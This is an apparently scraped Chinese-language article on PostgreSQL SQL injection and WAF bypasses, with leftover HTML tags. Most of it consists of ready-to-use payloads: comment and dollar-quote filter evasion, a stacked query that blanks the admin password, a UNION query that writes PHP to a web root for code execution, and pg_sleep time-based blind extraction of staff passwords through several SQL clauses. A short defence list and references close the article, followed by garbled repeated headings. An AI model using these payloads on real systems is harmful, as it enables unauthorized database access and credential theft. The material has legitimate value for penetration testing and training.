PostgreSQL SQL注入渗透与绕过技巧详解<\/h1>

1. PostgreSQL简介与SQL注入基础<\/h2>
PostgreSQL是一个开源的关系型数据库管理系统，强调可扩展性和技术标准合规性。它能够处理从单机到数据仓库或具有许多并发用户的Web服务的各种工作负载。<\/p>

1.1 SQL注入基本原理<\/h3>
SQL注入是一种攻击技术，攻击者通过在应用程序的输入字段中插入恶意SQL代码，从而操纵后端数据库查询。在PostgreSQL中，SQL注入漏洞的利用方式与其他数据库系统类似，但有一些特定的语法和函数可以利用。<\/p>

2. 绕过WAF的技巧<\/h2>

2.1 空格绕过<\/h3>

当空格被WAF过滤时，可以使用注释代替：<\/p>

SELECT<\/span>\/**\/<\/span>1<\/span>;
<\/span><\/span><\/code><\/pre>2.2 分号与注释<\/h3>
使用分号和注释来忽略尾随数据：<\/p>
SELECT<\/span> 'admin'<\/span> OR<\/span> 1<\/span> =<\/span> 1<\/span>; -- -' FROM users;
<\/span><\/span><\/span><\/code><\/pre>实际执行：<\/p>
SELECT<\/span> 'admin'<\/span> OR<\/span> 1<\/span> =<\/span> 1<\/span>;
<\/span><\/span><\/code><\/pre>2.3 引号绕过<\/h3>
使用美元符号<\/h4>
SELECT<\/span> 
<\/span><\/span>$$<\/span>
<\/span><\/span>test
<\/span><\/span>$$<\/span>
<\/span><\/span>;  -- 等效于 SELECT 'test';
<\/span><\/span><\/span><\/code><\/pre>使用带标签的美元符号<\/h4>
SELECT<\/span> $<\/span>quote$test$quote$;  -- 等效于 SELECT 'test';
<\/span><\/span><\/span><\/code><\/pre>使用CHR()函数拼接字符串<\/h4>
SELECT<\/span> CHR(65<\/span>)||<\/span>CHR(66<\/span>)||<\/span>CHR(67<\/span>)||<\/span>CHR(68<\/span>)||<\/span>CHR(69<\/span>)||<\/span>CHR(70<\/span>)||<\/span>CHR(71<\/span>)||<\/span>CHR(72<\/span>);
<\/span><\/span>-- 等效于 SELECT 'ABCDEFGH';
<\/span><\/span><\/span><\/code><\/pre>3. 嵌套查询（堆叠查询）<\/h2>
当注入点支持嵌套查询时，可以终止原始查询并执行新查询：<\/p>
SELECT<\/span> ''<\/span>; UPDATE<\/span> users SET<\/span> password =<\/span> ''<\/span> WHERE<\/span> name =<\/span> 'admin'<\/span>; -- -
<\/span><\/span><\/span><\/code><\/pre>4. 不同SQL子句的攻击方法<\/h2>
4.1 SELECT\/UNION子句注入<\/h3>
基本UNION注入<\/h4>
SELECT<\/span> '1'<\/span> UNION<\/span> SELECT<\/span> 'a'<\/span>; -- -'
<\/span><\/span><\/span><\/code><\/pre>通过PHP代码实现RCE<\/h4>
SELECT<\/span> ''<\/span>UNION<\/span> SELECT<\/span> 'MALICIOUS PHP CODE'<\/span> \<\/span>g<\/span> \/<\/span>var\/<\/span>www\/<\/span>test.php; -- -';
<\/span><\/span><\/span><\/code><\/pre>时间盲注<\/h4>
SELECT<\/span> ''<\/span> pg_sleep((ASCII((SELECT<\/span> 'a'<\/span> LIMIT<\/span> 1<\/span>)) -<\/span> 32<\/span>) \/<\/span> 2<\/span>); -- -
<\/span><\/span><\/span><\/code><\/pre>字符串连接泄露数据<\/h4>
SELECT<\/span> ''<\/span>||<\/span>password FROM<\/span> users;
<\/span><\/span><\/code><\/pre>4.2 WHERE子句注入<\/h3>
基本注入<\/h4>
SELECT<\/span> first_name FROM<\/span> actor WHERE<\/span> first_name =<\/span> ''<\/span>||<\/span>(SELECT<\/span> 'Penelope'<\/span>);
<\/span><\/span><\/code><\/pre>基于条件的二进制查询<\/h4>
SELECT<\/span> first_name FROM<\/span> actor WHERE<\/span> first_name =<\/span> ''<\/span> ||<\/span> (
<\/span><\/span>  SELECT<\/span> CASE<\/span> WHEN<\/span> (
<\/span><\/span>    SELECT<\/span> COUNT<\/span>((
<\/span><\/span>      SELECT<\/span> username FROM<\/span> staff WHERE<\/span> username SIMILAR<\/span> TO<\/span> '[BRUTEFORCE BYTE BY BYTE]%'<\/span>
<\/span><\/span>    ))
<\/span><\/span>  ) <><\/span> 0<\/span> THEN<\/span> 'Penelope'<\/span> ELSE<\/span> ''<\/span> END<\/span>
<\/span><\/span>);
<\/span><\/span><\/code><\/pre>4.3 FROM子句注入<\/h3>
时间盲注<\/h4>
SELECT<\/span> address FROM<\/span> (
<\/span><\/span>  SELECT<\/span> *<\/span> FROM<\/span> address WHERE<\/span> address=<\/span>''<\/span>||<\/span>(pg_sleep(20<\/span>))
<\/span><\/span>) ss;
<\/span><\/span><\/code><\/pre>数据泄露<\/h4>
SELECT<\/span> address FROM<\/span> (
<\/span><\/span>  SELECT<\/span> *<\/span> FROM<\/span> address WHERE<\/span> address =<\/span> ''<\/span> ||<\/span> (
<\/span><\/span>    SELECT<\/span> CASE<\/span> WHEN<\/span> (
<\/span><\/span>      SELECT<\/span> COUNT<\/span>((
<\/span><\/span>        SELECT<\/span> username FROM<\/span> staff WHERE<\/span> username SIMILAR<\/span> TO<\/span> 'M%'<\/span>
<\/span><\/span>      ))
<\/span><\/span>    ) <><\/span> 0<\/span> THEN<\/span> pg_sleep(20<\/span>) ELSE<\/span> ''<\/span> END<\/span>
<\/span><\/span>  )
<\/span><\/span>) ss; -- -;
<\/span><\/span><\/span><\/code><\/pre>4.4 ORDER BY子句注入<\/h3>
基于条件的注入<\/h4>
SELECT<\/span> address FROM<\/span> address ORDER<\/span> BY<\/span> (
<\/span><\/span>  SELECT<\/span> CASE<\/span> WHEN<\/span> COUNT<\/span>((
<\/span><\/span>    SELECT<\/span> (
<\/span><\/span>      SELECT<\/span> CASE<\/span> WHEN<\/span> COUNT<\/span>((
<\/span><\/span>        SELECT<\/span> username FROM<\/span> staff WHERE<\/span> username SIMILAR<\/span> TO<\/span> 'M%'<\/span>
<\/span><\/span>      )) <><\/span> 0<\/span> THEN<\/span> pg_sleep(20<\/span>) ELSE<\/span> ''<\/span> END<\/span>
<\/span><\/span>    )
<\/span><\/span>  )) <><\/span> 0<\/span> THEN<\/span> true<\/span> ELSE<\/span> false<\/span> END<\/span>
<\/span><\/span>); -- -
<\/span><\/span><\/span><\/code><\/pre>4.5 OFFSET子句注入<\/h3>
泄露字符串长度<\/h4>
SELECT<\/span> address FROM<\/span> address OFFSET<\/span> 0<\/span>|<\/span>(
<\/span><\/span>  SELECT<\/span> LENGTH<\/span>((SELECT<\/span> username FROM<\/span> staff WHERE<\/span> username SIMILAR<\/span> TO<\/span> 'M%'<\/span>))
<\/span><\/span>);
<\/span><\/span><\/code><\/pre>逐字节暴力破解<\/h4>
SELECT<\/span> address FROM<\/span> address OFFSET<\/span> 0<\/span>+<\/span>(
<\/span><\/span>  SELECT<\/span> LENGTH<\/span>((SELECT<\/span> password FROM<\/span> staff WHERE<\/span> password SIMILAR<\/span> TO<\/span> '8%'<\/span> LIMIT<\/span> 1<\/span>))
<\/span><\/span>);
<\/span><\/span><\/code><\/pre>4.6 HAVING子句注入<\/h3>
基于条件的注入<\/h4>
t' AND (SELECT COUNT((SELECT password FROM staff WHERE password SIMILAR TO '<\/span>8<\/span>%<\/span>' LIMIT 1))) = 1; -- -
<\/span><\/span><\/span><\/code><\/pre>5. 快速测试漏洞的Payload<\/h2>
5.1 SELECT子句测试<\/h3>
整数参数<\/h4>
pg_sleep(20<\/span>); -- -
<\/span><\/span><\/span><\/code><\/pre>字符串参数<\/h4>
'||pg_sleep(20); -- -
<\/span><\/span><\/span><\/code><\/pre>5.2 FROM子句测试<\/h3>
已知列需要整数<\/h4>
(SELECT<\/span> *<\/span> FROM<\/span> [TABLE<\/span>] WHERE<\/span> [COLUMN<\/span>] =<\/span> 1<\/span>|<\/span>(
<\/span><\/span>  SELECT<\/span> (
<\/span><\/span>    SELECT<\/span> CASE<\/span> WHEN<\/span> COUNT<\/span>((SELECT<\/span> pg_sleep(20<\/span>))) <><\/span> 0<\/span> THEN<\/span> 1<\/span> ELSE<\/span> 2<\/span> END<\/span>
<\/span><\/span>  )
<\/span><\/span>)) ss; -- -
<\/span><\/span><\/span><\/code><\/pre>已知列需要字符串<\/h4>
(SELECT<\/span> *<\/span> FROM<\/span> [TABLE<\/span>] WHERE<\/span> [COLUMN<\/span>] =<\/span> 'asd'<\/span>::varchar ||<\/span> (
<\/span><\/span>  SELECT<\/span> (
<\/span><\/span>    SELECT<\/span> CASE<\/span> WHEN<\/span> COUNT<\/span>((SELECT<\/span> pg_sleep(20<\/span>))) <><\/span> 0<\/span> THEN<\/span> 1<\/span> ELSE<\/span> 2<\/span> END<\/span>
<\/span><\/span>  )
<\/span><\/span>)) ss; -- -
<\/span><\/span><\/span><\/code><\/pre>5.3 WHERE子句测试<\/h3>
整数参数<\/h4>
1<\/span>|<\/span>(
<\/span><\/span>  SELECT<\/span> (
<\/span><\/span>    SELECT<\/span> CASE<\/span> WHEN<\/span> COUNT<\/span>((SELECT<\/span> pg_sleep(20<\/span>))) <><\/span> 0<\/span> THEN<\/span> 1<\/span> ELSE<\/span> 2<\/span> END<\/span>
<\/span><\/span>  )
<\/span><\/span>); -- -
<\/span><\/span><\/span><\/code><\/pre>字符串参数<\/h4>
' || (pg_sleep(20)); -- -
<\/span><\/span><\/span><\/code><\/pre>5.4 ORDER BY子句测试<\/h3>
(SELECT<\/span> CASE<\/span> WHEN<\/span> COUNT<\/span>((SELECT<\/span> pg_sleep(20<\/span>))) <><\/span> 0<\/span> THEN<\/span> true<\/span> ELSE<\/span> false<\/span> END<\/span>); -- -
<\/span><\/span><\/span><\/code><\/pre>5.5 HAVING子句测试<\/h3>
整数参数<\/h4>
(COUNT<\/span>((SELECT<\/span> pg_sleep(20<\/span>))) =<\/span> 1<\/span>); -- -
<\/span><\/span><\/span><\/code><\/pre>字符串参数<\/h4>
t' AND (SELECT COUNT((SELECT pg_sleep(20)))) = 1; -- -
<\/span><\/span><\/span><\/code><\/pre>5.6 OFFSET子句测试<\/h3>
整数参数<\/h4>
1<\/span>|<\/span>(SELECT<\/span> COUNT<\/span>((SELECT<\/span> pg_sleep(20<\/span>)))); -- -
<\/span><\/span><\/span><\/code><\/pre>字符串参数<\/h4>
1<\/span>'::integer + 1|(SELECT COUNT((SELECT pg_sleep(20)))); -- -
<\/span><\/span><\/span><\/code><\/pre>6. 防御建议<\/h2>

使用参数化查询（预编译语句）<\/li>
实施最小权限原则<\/li>
对用户输入进行严格的验证和过滤<\/li>
使用Web应用防火墙(WAF)<\/li>
定期更新PostgreSQL到最新版本<\/li>
禁用不必要的PostgreSQL功能<\/li>
实施适当的错误处理机制<\/li>
<\/ol>
7. 总结<\/h2>
PostgreSQL SQL注入技术与其他数据库系统有许多相似之处，但也有其特定的语法和函数可以利用。通过理解不同SQL子句的注入方法，攻击者可以绕过各种安全限制并获取敏感数据。防御者需要全面了解这些技术才能有效保护系统安全。<\/p>
8. 参考文献<\/h2>

PostgreSQL官方文档: https:\/\/www.postgresql.org\/docs\/9.5\/sql-select.html<\/li>
PostgreSQL注入技术白皮书: https:\/\/www.infigo.hr\/files\/INFIGO-TD-2009-04_PostgreSQL_injection_ENG.pdf<\/li>
<\/ol>

PostgreSQL SQL注入渗透与绕过技巧详解<\/h1>

1. PostgreSQL简介与SQL注入基础<\/h2> PostgreSQL是一个开源的关系型数据库管理系统，强调可扩展性和技术标准合规性。它能够处理从单机到数据仓库或具有许多并发用户的Web服务的各种工作负载。<\/p>

2. 绕过WAF的技巧<\/h2>

2.3 引号绕过<\/h3>

4. 不同SQL子句的攻击方法<\/h2>

4.1 SELECT\/UNION子句注入<\/h3>

4.2 WHERE子句注入<\/h3>

4.3 FROM子句注入<\/h3>

4.4 ORDER BY子句注入<\/h3>

4.5 OFFSET子句注入<\/h3>

4.6 HAVING子句注入<\/h3>

5. 快速测试漏洞的Payload<\/h2>

5.1 SELECT子句测试<\/h3>

5.2 FROM子句测试<\/h3>

5.3 WHERE子句测试<\/h3>

5.5 HAVING子句测试<\/h3>

5.6 OFFSET子句测试<\/h3>

8. 参考文献<\/h2> PostgreSQL官方文档: https:\/\/www.postgresql.org\/docs\/9.5\/sql-select.html<\/li> PostgreSQL注入技术白皮书: https:\/\/www.infigo.hr\/files\/INFIGO-TD-2009-04_PostgreSQL_injection_ENG.pdf<\/li> <\/ol>

1. PostgreSQL简介与SQL注入基础<\/h2>
PostgreSQL是一个开源的关系型数据库管理系统，强调可扩展性和技术标准合规性。它能够处理从单机到数据仓库或具有许多并发用户的Web服务的各种工作负载。<\/p>

8. 参考文献<\/h2>

PostgreSQL官方文档: https:\/\/www.postgresql.org\/docs\/9.5\/sql-select.html<\/li>
PostgreSQL注入技术白皮书: https:\/\/www.infigo.hr\/files\/INFIGO-TD-2009-04_PostgreSQL_injection_ENG.pdf<\/li> <\/ol>